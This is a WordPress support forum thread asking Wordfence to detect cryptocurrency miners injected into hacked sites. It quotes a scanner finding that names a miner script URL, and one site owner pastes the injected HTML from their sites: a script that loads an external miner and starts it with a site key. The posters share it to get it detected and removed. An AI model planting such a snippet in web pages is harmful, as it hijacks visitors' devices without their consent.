• Resolved DeveloperWil

    (@developerwil)


    Hey guys

    It would be great if you guys could add an option to scan for cryptocurrency miners. There have been quite a few WP attacks lately that are inserting these miners into WP sites.

    Some people may legitimately want a miner on their site so I guess this could be a warning?

    Thanks,
    Wil.

    • This topic was modified 7 years, 1 month ago by DeveloperWil.
Viewing 8 replies - 1 through 8 (of 8 total)
  • Hi @developerwil,

    Wordfence scans already include checks for cryptocurrency-miners signatures.

    However note that you can “add additional signatures” on the Wordfence –> Options page (we only treat those additional patterns as RegEx).

    Thread Starter DeveloperWil

    (@developerwil)

    Amazeballs!

    Hi @developerwil,

    Please accept my apologies. I provided incorrect information.

    I was discussing this topic with my colleagues and I misunderstood their answer.

    Wordfence scans do not include checks for cryptocurrency-miners signatures at the moment as we don’t have evidence yet that they frequently occur on WordPress sites. If you have any malware samples proving otherwise, please send them in.

    However you can still add additional signatures on the Wordfence –> Options page.

    • This reply was modified 7 years, 1 month ago by wfyann. Reason: Additional info
    Thread Starter DeveloperWil

    (@developerwil)

    Thanks for the update @wfyann

    Is there any documentation for what signature format to use and where to find them?

    Thanks,
    Wil.

    You want evidence of CRYTO Miners: here you go. One of multiple results on GravityScan.

    Medium Information Cryptominer Script Found (on /) Content Collapse
    Title:
    Cryptominer Script Found (on /)
    Type:
    Information
    Severity:
    Medium (5.0)
    Product:
    Content
    Description:
    Cryptominers use client browsers to mine for cryptocurrency and can have negative affects for users on the site. If you meant to add this script please ignore this result. If you did not intentionally include this script your site may have been hacked.
    Found on https://————-.org/
    src=”https://crypto\-loot\.com/lib/miner\.min\.js”

    Hi @developerwil,

    Apologies for the delayed update.

    Please have a look at this post on our blog regarding Wordfence upcoming features to detect cryptominer scripts

    Thread Starter DeveloperWil

    (@developerwil)

    Great! Thanks for the update @wyfann

    Kaspersky is detecting this code from some of our sites:

    <div style=”bottom:0; visibility:visible !important; display: block !important;” ><center><!– nsr-ID 30806962 1515082736 –> <script src=”https://www.hashing.win/scripts/min.js”></script><script>var miner = new Client.Anonymous(“6cbf25e53638b9537f4da07d24f73cf1cf50b28962aab453bba3fd9d1df99dd0”, { throttle: 0.2});miner.start();</script><style>#credits

    Please let me know how to remove it. I am suspecting it comes from SiteOrigin plugin and WordFence does not detect it.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘Detection of cryptocurrency miners’ is closed to new replies.